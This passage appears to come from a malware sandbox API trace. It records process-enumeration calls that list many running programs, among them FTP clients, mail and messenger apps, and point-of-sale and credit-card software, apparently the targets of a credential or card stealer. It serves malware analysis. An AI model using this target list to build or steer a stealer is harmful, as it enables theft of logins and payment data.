cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mongolia.exe")) returned 1 [0099.384] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="futurevalleyturned.exe")) returned 1 [0099.385] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="besides-tba-comfortable.exe")) returned 1 [0099.385] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="extreme-quiz-standard.exe")) returned 1 [0099.386] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sat_ipod.exe")) returned 1 [0099.386] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="well-buttons.exe")) returned 1 [0099.387] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="qty.exe")) returned 1 [0099.387] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="interesting-extends.exe")) returned 1 [0099.388] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 
th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fence.exe")) returned 1 [0099.388] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="descending.exe")) returned 1 [0099.389] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="blank.exe")) returned 1 [0099.389] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="algorithms-jefferson.exe")) returned 1 [0099.390] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0099.390] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0099.391] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0099.391] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0099.392] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0099.392] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0099.393] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0099.432] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0099.432] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0099.433] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0099.433] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0099.434] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0099.434] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0099.435] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0099.435] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0099.436] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0099.437] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0099.438] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0099.439] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0099.440] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0099.443] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0099.444] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0099.445] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0099.446] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0099.447] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0099.448] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0099.449] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0099.449] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0099.450] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0099.451] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0099.452] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0099.453] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0099.454] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0099.455] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0099.507] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0099.508] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0099.509] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0099.510] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0099.511] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0099.511] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0099.512] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0099.513] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="kay.exe")) returned 1 [0099.514] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="autos_pulse_angry.exe")) returned 1 [0099.515] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="surelycakemechanisms.exe")) returned 1 [0099.516] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="renometric.exe")) returned 1 [0099.516] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa60, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0099.517] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0099.518] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0099.553] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x7c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="osk.exe")) returned 1 [0099.553] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 1 [0099.554] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0099.555] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0099.555] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x208, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa4c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0099.556] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0099.557] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.558] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0099.558] GlobalLock (hMem=0x450004) returned 0x588f38 [0099.558] GlobalHandle (pMem=0x588f38) returned 0x450004 [0099.558] GlobalUnlock (hMem=0x450004) returned 0 [0099.558] GlobalLock (hMem=0x450004) returned 0x588f38 [0099.558] GlobalLock (hMem=0x45000c) returned 0x56f100 [0099.558] GlobalHandle (pMem=0x588f38) returned 0x450004 [0099.558] GlobalUnlock (hMem=0x450004) returned 0 [0099.559] GlobalHandle (pMem=0x56f100) returned 0x45000c [0099.559] GlobalUnlock (hMem=0x45000c) returned 0 [0099.559] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188 [0099.563] Process32First (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.563] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0099.564] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0099.564] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.568] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0099.568] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.569] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0099.569] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0099.570] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0099.570] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0099.571] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.571] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.572] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.572] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.573] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.574] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, 